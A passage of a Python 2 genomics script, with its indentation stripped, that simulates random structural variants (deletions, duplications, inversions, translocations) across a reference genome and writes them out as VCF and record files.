sv_out[ks1][ks2].append(ka_new)
def write_VCF_header(output_file):
fo=open(output_file,'w')
print output_file
print>>fo, '##fileformat=VCFv4.1'
print>>fo,'##fileDate='+time.strftime("%Y%m%d")
print>>fo,'##reference=hg19'
print>>fo,'##INFO=<ID=BKPTID,Number=.,Type=String,Description="ID of the assembled alternate allele in the assembly file">'
print>>fo,'##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">'
print>>fo,'##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">'
print>>fo,'##INFO=<ID=END,Number=1,Type=Integer,Description="End position of the variant described in this record">'
print>>fo,'##INFO=<ID=HOMLEN,Number=.,Type=Integer,Description="Length of base pair identical micro-homology at event breakpoints">'
print>>fo,'##INFO=<ID=HOMSEQ,Number=.,Type=String,Description="Sequence of base pair identical micro-homology at event breakpoints">'
print>>fo,'##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">'
print>>fo,'##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END,POLARITY">'
print>>fo,'##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="Difference in length between REF and ALT alleles">'
print>>fo,'##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">'
print>>fo,'##FILTER=<ID=LowQual,Description="Score of final structural - Theoretical Score <-50">'
print>>fo,'##ALT=<ID=DEL,Description="Deletion">'
print>>fo,'##ALT=<ID=DEL:ME:ALU,Description="Deletion of ALU element">'
print>>fo,'##ALT=<ID=DEL:ME:L1,Description="Deletion of L1 element">'
print>>fo,'##ALT=<ID=DUP,Description="Duplication">'
print>>fo,'##ALT=<ID=DUP_TANDEM,Description="Tandem Duplication">'
print>>fo,'##ALT=<ID=INS,Description="Insertion of novel sequence">'
print>>fo,'##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">'
print>>fo,'##ALT=<ID=INS:ME:L1,Description="Insertion of L1 element">'
print>>fo,'##ALT=<ID=INV,Description="Inversion">'
print>>fo,'##ALT=<ID=CNV,Description="Copy number variable region">'
print>>fo,'##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">'
print>>fo,'##FORMAT=<ID=GQ,Number=1,Type=Float,Description="Genotype quality">'
print>>fo,'##FORMAT=<ID=CN,Number=1,Type=Integer,Description="Copy number genotype for imprecise events">'
print>>fo,'##FORMAT=<ID=CNQ,Number=1,Type=Float,Description="Copy number genotype quality for imprecise events">'
print>>fo,'\t'.join(['#CHROM','POS','ID','REF','ALT','QUAL','FILTER','INFO','FORMAT',output_file.split('/')[-1].replace('.vcf','')])
fo.close()
def write_VCF_main(output_file):
fo=open(output_file,'a')
print output_file
sv_reorganize={}
for k1 in sv_out.keys():
sv_reorganize[k1]={}
for k2 in sv_out[k1].keys():
start=int(k2.split('_')[1])
if not start in sv_reorganize[k1].keys():
sv_reorganize[k1][start]={}
SVtemp_a=[]
SVtemp_b=[]
for k3 in sv_out[k1][k2]:
if not k3[:-1] in SVtemp_a:
SVtemp_a.append(k3[:-1])
SVtemp_b.append([k3[-1]])
else:
SVtemp_b[SVtemp_a.index(k3[:-1])].append(k3[-1])
SVtemp=[]
sv_reorganize[k1][start][k2]=[]
for k3 in range(len(SVtemp_a)):
if len(SVtemp_b[k3])==2 and SVtemp_b[k3] in [['0|1', '1|0'],['1|0', '0|1']]:
SVtemp_b[k3]=['1|1']
for k3 in range(len(SVtemp_a)):
for k4 in SVtemp_b[k3]:
sv_reorganize[k1][start][k2].append(SVtemp_a[k3]+[k4])
for k1 in chromos:
if k1 in sv_reorganize.keys():
for k2 in sorted(sv_reorganize[k1].keys()):
for k3 in sorted(sv_reorganize[k1][k2].keys()):
for k4 in sv_reorganize[k1][k2][k3]:
if k4[3]=='N':
k4[3]=ref_base_returnN(ref,k4[0],k4[1])
print >>fo, '\t'.join([str(i) for i in k4])
fo.close()
def simple_flag_SA(k1,k2):
temp=[]
break_flag=0
for i in k2:
if not i=='^':
temp.append(i)
else:
temp[-1]+=i
temp2=[temp[0]]
for i in range(len(temp[1:])):
if not '^' in temp[i] and not '^' in temp[i+1] and ord(temp[i+1])-ord(temp[i])==1:
temp2[-1]+=temp[i+1]
elif '^' in temp[i] and '^' in temp[i+1] and ord(temp[i+1][0])-ord(temp[i][0])==-1:
temp2[-1]=temp[i+1][0]+temp2[-1]
else:
temp2.append(temp[i+1])
outdel=[]
outinv=[]
outdup=[]
outtra=0
for i in range(len(temp2)):
j=temp2[i]
if '^' in j:
if not j.replace('^','') in outinv:
outinv.append(j.replace('^',''))
temp2[i]=j.replace('^','')
temp3=''.join(temp2)
for i in range(len(temp3)-1):
if ord(temp3[i+1])-ord(temp3[i])<0:
outtra=1
if not temp3==k1:
temp4=[]
for i in temp3:
if temp3.count(i)>1:
if not i in outdup:
outdup.append(i)
if not i in temp4:
temp4.append(i)
if not ''.join(temp4)==k1:
for i in k1:
if not i in temp4:
outdel.append(i)
if not outdup==[]:
dupuni=unit_produce(outdup)
outdup2=[]
k3=k2
for i in dupuni:
ia=i
ib=''.join([j+'^' for j in i[::-1]])
if len(i)>1:
if temp2.count(ia)+temp2.count(ib)>1:
outdup2.append([i,temp2.count(ia)+temp2.count(ib)])
k3=k3.replace(ia,'')
k3=k3.replace(ib,'')
elif len(i)==1:
if k3.count(ia)+k3.count(ib)>1:
outdup2.append([i,k3.count(ia)])
k3=k3.replace(ia,'')
k3=k3.replace(ib,'')
else:
outdup2=[]
return [outdel,outinv,outdup2,outtra]
def add_csv_info(csv1,flag_sex,k1,k2):
#flag_sex=1: Maternal
#flag_sex=2: Paternal
if flag_sex==1:
del_let=[csv1[0],[]]
inv_let=[csv1[1],[]]
dup_let=[csv1[2],[]]
else:
del_let=[[],csv1[0]]
inv_let=[[],csv1[1]]
dup_let=[[],csv1[2]]
for k3 in sv_info[k1][k2]:
del_info_add(k3,del_let)
inv_info_add(k3,inv_let)
dup_info_2_add(k3,dup_let)
if csv1[3]==1:
tra_info_add(k1,k2)
def del_info_add(k3,del_let):
tempa=bp_to_hash(k3[:-1],del_let[0])
tempb=bp_to_hash(k3[:-1],del_let[1])
for k1 in tempa:
if k1 in tempb:
tempc='hom'
tempb.remove(k1)
else:
tempc='heta'
if not k1[0] in del1.keys():
del1[k1[0]]=[]
del1[k1[0]].append(k1[1:]+[tempc,k3[-1],'_'.join(k3[:-1])])
for k1 in tempb:
if not k1[0] in del1.keys():
del1[k1[0]]=[]
del1[k1[0]].append(k1[1:]+['hetb',k3[-1],'_'.join(k3[:-1])])
def dup_info_add(k3,dup_let):
#dup_let=[k2i,k2j]
for k2x in dup_let:
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4])
for k5 in temp:
if not k5[0] in dup1.keys():
dup1[k5[0]]=[]
dup1[k5[0]].append(k5[1:]+[k3[-1],'_'.join(k3[:-1]),k2a.count(k4)])
def dup_info_2_add(k3,dup_let):
temprec=-1
for k2x in dup_let:
temprec+=1
hetx=['heta','hetb'][temprec]
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4[0]])
for k5 in temp:
if not k5[0] in dup1.keys():
dup1[k5[0]]=[]
if k4[1]>1:
dup1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1]),k4[1]])
def inv_info_add(k3,inv_let):
#inv_let=[k2m,k2n]
temprec=-1
for k2x in inv_let:
temprec+=1
hetx=['heta','hetb'][temprec]
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4])
for k5 in temp:
if not k5[0] in inv1.keys():
inv1[k5[0]]=[]
inv1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1])])
def let_reclust(vec_in):
if vec_in==[]:
return []
else:
k2e=[]
k2e=[vec_in[0]]
for k3 in range(len(vec_in)-1):
if '^' in vec_in[k3+1]:
if '^' in vec_in[k3] and ord(vec_in[k3][0])-ord(vec_in[k3+1][0])==1:
k2e[-1]+=vec_in[k3+1]
else:
k2e.append(vec_in[k3+1])
else:
if ord(vec_in[k3+1][0])-ord(vec_in[k3][0])==1 and not '^' in vec_in[k3]:
k2e[-1]+=vec_in[k3+1]
else:
k2e.append(vec_in[k3+1])
k2f=[]
for k3 in k2e:
if '^' in k3:
k5=''
for k4 in range(len(k3)/2):
k5+=k3[2*k4]
k6=k5[::-1]+'^'
if not k6 in k2f:
k2f.append(k6)
else:
k2f.append(k3)
return k2f
def dup_let_recombind(vec_in):
if vec_in==[]:
return []
else:
vec2=sorted(vec_in)
vec=[[vec2[0]]]
for ka in vec2[1:]:
if ord(ka)-ord(vec[-1][-1])==1:
vec[-1].append(ka)
else:
vec.append([ka])
vec3=[]
for ka in vec:
if len(ka)==1:
vec3.append(ka)
else:
for kb in range(2,len(ka)+1):
for kc in ka[:(1-kb)]:
vec3.append([])
for kd in range(kb):
vec3[-1].append(ka[ka.index(kc)+kd])
vec4=[''.join(i) for i in vec3]
return vec4
def comp_info_reorganize(k1,k2):
del_let=[[],[]]
dup_let=[[],[]]
inv_let=[[],[]]
tra_let=[[],[]]
k2a=k2.split('/')[0]
k2b=k2.split('/')[1]
k2c=[]
k2d=[]
for k3 in k2a:
if not k3=='^':
k2c.append(k3)
else:
k2c[-1]+=k3
for k3 in k2b:
if not k3=='^':
k2d.append(k3)
else:
k2d[-1]+=k3
for k3 in k1.split('/')[0]:
if k2a.count(k3)==0:
del_let[0].append(k3)
if k2b.count(k3)==0:
del_let[1].append(k3)
if k2a.count(k3)>1:
dup_let[0].append(k3)
if k2b.count(k3)>1:
dup_let[1].append(k3)
k2e=let_reclust(k2c)
k2f=let_reclust(k2d)
k2g=dup_let_recombind(dup_let[0])
k2h=dup_let_recombind(dup_let[1])
k2i=[]
#integreated dup sections
k2j=[]
#integreated dup sections
for k3 in k2g:
flag1=0
for k4 in k2e:
if k3 in k4:
flag1+=1
if flag1>1:
k2i.append(k3)
for k3 in dup_let[0]:
if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
if not k3[0] in k2i:
k2i.append(k3[0])
for k3 in k2h:
flag1=0
for k4 in k2e:
if k3 in k4:
flag1+=1
if flag1>1:
k2j.append(k3)
for k3 in dup_let[1]:
if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
if not k3[0] in k2j:
k2j.append(k3[0])
k2m=[]
for k3 in k2e:
if k3[-1]=='^':
k2m.append(k3)
k2n=[]
for k3 in k2f:
if k3[-1]=='^':
k2n.append(k3)
for k3 in sv_info[k1][k2]:
del_info_add(k3,del_let)
dup_info_add(k3,[k2i,k2j])
inv_info_add(k3,[k2m,k2n])
def bp_to_hash(bp_list,sv_let):
bp_hash={}
block_rec=0
block_hash=[]
sv_let=[i[0] for i in sv_let]
for a3 in bp_list:
if a3 in chromos or not a3.isdigit():
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
out=[]
if not sv_let==[]:
if len(sv_let)==1:
out=[bp_hash[sv_let[0]]]
else:
out.append(bp_hash[sv_let[0]])
for ka in range(len(sv_let)-1):
if ord(sv_let[ka+1])-ord(sv_let[ka])==1 and bp_hash[sv_let[ka+1]][0]==bp_hash[sv_let[ka]][0]:
out[-1]+=bp_hash[sv_let[ka+1]][1:]
else:
out.append(bp_hash[sv_let[ka+1]])
out2=[]
for ka in out:
out2.append([ka[0],int(ka[1]),int(ka[-1])])
return out2
def tra_info_add(k1,k2):
for k3 in sv_info[k1][k2]:
SV_ID='_'.join([str(i) for i in k3])
tra1[SV_ID]={}
k2a=k2.split('/')[0]
k2b=k2.split('/')[1]
bp_hash={}
block_rec=0
block_hash=[]
for a3 in k3[:-1]:
if a3 in chromos or not a3.isdigit():
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
for a3 in bp_hash.keys():
temp=[]
for a4 in bp_hash[a3][1:]:
temp.append(int(a4)-1)
temp.append(int(a4))
bp_hash[a3][1:]=temp
#ref_allele['left']=[ref_allele[k1[0]][0]]
#ref_allele['right']=[ref_allele[k1[-1]][1]]
bp_hash['left']=[bp_hash[k1[0]][0],bp_hash[k1[0]][1],bp_hash[k1[0]][2]]
bp_hash['right']=[bp_hash[k1[-1]][0],bp_hash[k1[-1]][3],bp_hash[k1[-1]][4]]
ref_allele={}
for a3 in bp_hash.keys():
ref_allele[a3]=[bp_hash[a3][0]]
for a4 in bp_hash[a3][1:]:
ref_allele[a3].append(ref_base_returnN(ref,bp_hash[a3][0],a4))
if not k2a==k1.split('/')[0] and del_flag_SA(k1.split('/')[0],k2a)==0:
flag1=0#flag1==0:w/o inversion in the alt structure
if '^' in k2a:
flag1+=1
flag2=0#flag2==0:w/o duplication in the alt structure
for j in k2a:
if k2a.count(j)>1:
flag2+=1
flag3=0 #flag3==0: w/o translocation
if len(k2a)>1:
for i in range(len(k2a)-1):
if not ord(k2a[i+1])>ord(k2a[i]):
flag3+=1
if flag1+flag2+flag3==0:
heta_Del_block=[]
for a1 in k1.split('/')[0]:
if not a1 in k2a:
heta_Del_block.append(a1)
tra1[SV_ID]['a']=[]
block_hash=[]
del_hash={}
block_rec=0
for a3 in a2[0]:
if a3 in chromos:
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
if not heta_Del_block==[]:
a_heta=0
heta_Del_new=[heta_Del_block[0]]
while True:
a_heta+=1
if a_heta==len(heta_Del_block):break
if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
heta_Del_new[-1]+=heta_Del_block[a_heta]
else:
heta_Del_new.append(heta_Del_block[a_heta])
for a3 in heta_Del_new:
a4=a3[0]
tra1[SV_ID]['a'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
a4=a3[-1]
tra1[SV_ID]['a'][-1].append(int(del_hash[a4][2])-1)
else:
tra1[SV_ID]['a']=[]
t1=[]
for a3 in k2a:
if not a3=='^':
t1.append(a3)
else:
t1[-1]+=a3
t2=[t1[0]]
for a3 in t1[1:]:
if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
t2[-1]+=a3
elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
t2[-1]+=a3
else:
t2.append(a3)
a3='left'
a4=t2[0]
l_chr=bp_hash[a3][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a4:
if not a4[0]==k1[0]:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a4:
tra1[SV_ID]['a'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
for t3 in range(len(t2)-1):
a3=t2[t3]
a4=t2[t3+1]
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a3 and not '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a3 and not '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
elif not '^' in a3 and '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
elif '^' in a3 and '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
if len(t2)>1:
a3=t2[t3+1]
else:
a3=t2[0]
a4='right'
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4][0]
if not '^' in a3:
if not a3[-1]==k1[-1]:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
if '^' in a3:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
#print [k1,k2]
if not k2b==k1.split('/')[1] and del_flag_SA(k1.split('/')[1],k2b)==0:
flag1=0#flag1==0:w/o inversion in the alt structure
if '^' in k2b:
flag1+=1
flag2=0#flag2==0:w/o duplication in the alt structure
for j in k2b:
if k2b.count(j)>1:
flag2+=1
flag3=0 #flag3==0: w/o translocation
if len(k2b)>1:
for i in range(len(k2b)-1):
if not ord(k2b[i+1])>ord(k2b[i]):
flag3+=1
if flag1+flag2+flag3==0:
heta_Del_block=[]
for a1 in k1.split('/')[1]:
if not a1 in k2b:
heta_Del_block.append(a1)
tra1[SV_ID]['b']=[]
block_hash=[]
del_hash={}
block_rec=0
for a3 in a2[0]:
if a3 in chromos:
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
if not heta_Del_block==[]:
a_heta=0
heta_Del_new=[heta_Del_block[0]]
while True:
a_heta+=1
if a_heta==len(heta_Del_block):break
if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
heta_Del_new[-1]+=heta_Del_block[a_heta]
else:
heta_Del_new.append(heta_Del_block[a_heta])
for a3 in heta_Del_new:
a4=a3[0]
tra1[SV_ID]['b'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
a4=a3[-1]
tra1[SV_ID]['b'][-1].append(int(del_hash[a4][2])-1)
else:
tra1[SV_ID]['b']=[]
t1=[]
for a3 in k2b:
if not a3=='^':
t1.append(a3)
else:
t1[-1]+=a3
t2=[t1[0]]
for a3 in t1[1:]:
if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
t2[-1]+=a3
elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
t2[-1]+=a3
else:
t2.append(a3)
a3='left'
a4=t2[0]
l_chr=bp_hash[a3][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a4:
if not a4[0]==k1[0]:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a4:
tra1[SV_ID]['b'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
for t3 in range(len(t2)-1):
a3=t2[t3]
a4=t2[t3+1]
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a3 and not '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a3 and not '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
elif not '^' in a3 and '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
elif '^' in a3 and '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
if len(t2)>1:
a3=t2[t3+1]
else:
a3=t2[0]
a4='right'
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4][0]
if not '^' in a3:
if not a3[-1]==k1[-1]:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
if '^' in a3:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
def sv_homo_initial():
sv_homo_info['DEL']=[]
sv_homo_info['DUP']=[]
sv_homo_info['INV']=[]
sv_homo_info['TRA']=[]
sv_homo_info['DUP_TANDEM']=[]
def produce_keys(key):
if key=='DEL':
ka='a/a'
kb='/'
elif key=='DUP_TANDEM':
ka='a/a'
dup_num=random.sample(range(2,20),1)
kb='/'.join([''.join(['a' for i in range(dup_num[0])]),''.join(['a' for i in range(dup_num[0])])])
elif key=='INV':
ka='a/a'
kb='a^/a^'
elif key=='TRA':
ka='ab/ab'
kb='ba/ba'
elif key=='DUP':
ka='ab/ab'
kb='aba/aba'
return [ka,kb]
def sv_homo_produce():
for k1 in SV_region:
sv_len=k1[2]-k1[1]
k2=k1[-1]
sv_homo_info[k2].append(k1+produce_keys(k2))
def sv_het_produce():
for k1 in sv_homo_info.keys():
sv_het_info[k1]=[]
for k2 in sv_homo_info[k1]:
allele=random.choice(range(2))
alle_poor=[k2[-2].split('/')[0],k2[-1].split('/')[0]]
k2[-1]='/'.join([alle_poor[allele],alle_poor[1-allele]])
sv_het_info[k1].append(k2)
def sv_rec_homo_produce():
for k1 in sv_homo_info.keys():
fo=open(dict_opts['--output-prefix']+'.homo.'+k1+'.rec','w')
print dict_opts['--output-prefix']+'.homo.'+k1+'.rec'
for k2 in sv_homo_info[k1]:
print >>fo, ' '.join([str(i) for i in k2])
fo.close()
def sv_rec_het_produce():
for k1 in sv_het_info.keys():
fo=open(dict_opts['--output-prefix']+'.het.'+k1+'.rec','w')
print dict_opts['--output-prefix']+'.het.'+k1+'.rec'
for k2 in sv_het_info[k1]:
print >>fo, ' '.join([str(i) for i in k2])
fo.close()
def sv_info_rewrite(sv_h_info):
for k1 in sv_h_info.keys():
for k2 in sv_h_info[k1]:
if not k2[-2] in sv_info.keys():
sv_info[k2[-2]]={}
if not k2[-1] in sv_info[k2[-2]].keys():
sv_info[k2[-2]][k2[-1]]=[]
sv_info[k2[-2]][k2[-1]].append([str(i) for i in k2[:-3]]+[0.0])
def sv_stat_calcu(sv_hash,key):
out=[]
for k1 in sv_hash[key]:
sv_min=int(k1[1])
sv_max=int(k1[2])
sv_int=(int(k1[2])-int(k1[1]))/3
out.append([k1[0],sv_min,sv_min+sv_int, sv_max-sv_int,sv_max])
return out
def sv_size_pick(sv_stat):
out=[]
for k1 in sv_stat:
out+=[random.choice(range(int(k1[1]),int(k1[2]))) for i in range(int(k1[0]/3))]
out+=[random.choice(range(int(k1[2]),int(k1[3]))) for i in range(int(int(k1[0])-int(k1[0]/3))/2)]
out+=[random.choice(range(int(k1[3]),int(k1[4]))) for i in range(int(k1[0])-int(k1[0]/3)-int(int(k1[0])-int(k1[0]/3))/2)]
permute=random.sample(out,len(out))
return out
def chromos_readin(refs):
fin=open(refs+'.fai')
chromos=[]
chromo_length=[]
genome_length=0
for line in fin:
pin=line.strip().split()
chromos.append(pin[0])
genome_length+=int(pin[1])
chromo_length.append(int(pin[1]))
fin.close()
chromo_num_region=[]
for k1 in chromo_length:
chromo_num_region.append(int(round(float(k1)/float(genome_length)*sv_total_num)))
chrom_to_remove=[]
out_num_region=[]
out_chromos=[]
out_length={}
for i in range(len(chromo_num_region)):
if chromo_num_region[i]>1:
out_chromos.append(chromos[i])
out_num_region.append(chromo_num_region[i])
out_length[chromos[i]]=chromo_length[i]
return [genome_length]+[out_chromos]+[out_num_region]+[out_length]
def sv_hash_add(list_in,key):
for i in list_in:
if not i in sv_hash.keys():
sv_hash[i]=[key]
else:
sv_hash[i]+=[key]
def sv_region_pick():
#pick random regions across the genome
SV_region=[]
rec=-1
sv_size=del_size+dup_size+inv_size+tra_size+dup2_size
sv_size=random.sample(sv_size,len(sv_size))
for k1 in range(len(chromos)):
chromosome=chromos[k1]
num_region=chromo_num_region[k1]
range_region=chromo_length[chromosome]
temp_start_region=sorted(random.sample(range(1000, range_region-1000),num_region+1))
temp_end_region=[]
for k2 in range(num_region):
start=temp_start_region[k2]
start2=temp_start_region[k2+1]
if start2-start<1000: continue
rec+=1
temp_sv_size=sv_size[rec]
sv_type=sv_hash[sv_size[rec]][0]
del sv_hash[sv_size[rec]][0]
end=start+temp_sv_size
if not end<start2-300:
end=random.choice(range(start,int(numpy.mean([start,start2]))))
if sv_type=='TRA':
end2=random.choice(range(end+100,start2-100))
temp_end_region.append(end)
if sv_type=='TRA':
SV_region.append([chromos[k1],start,end,end2,sv_type])
else:
SV_region.append([chromos[k1],start,end,sv_type])
return SV_region
def ref_base_returnN(ref,chromo,pos):
return 'N'
def ref_base_readin(ref,chromo,pos):
fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,chromo,str(pos),str(pos)))
tre=fref.readline().strip().split()
REF_AL=fref.readline().strip().split()
if not REF_AL==[]:
return REF_AL[0]
else:
return 'N'
def del_flag_SA(k1,k2):
out=0
if not '^' in k2:
flagdup=0
for i in k2:
if k2.count(i)>1:
flagdup+=1
if flagdup==0:
flagtra=0
for i in range(len(k2)-1):
if ord(k2[i+1])-ord(k2[i])<1:
flagtra+=1
if flagtra==0:
if not k1==k2:
out=1
return out
def order_SV_Homo_write(sv_info):
for k1 in sv_info.keys():
for k2 in sv_info[k1].keys():
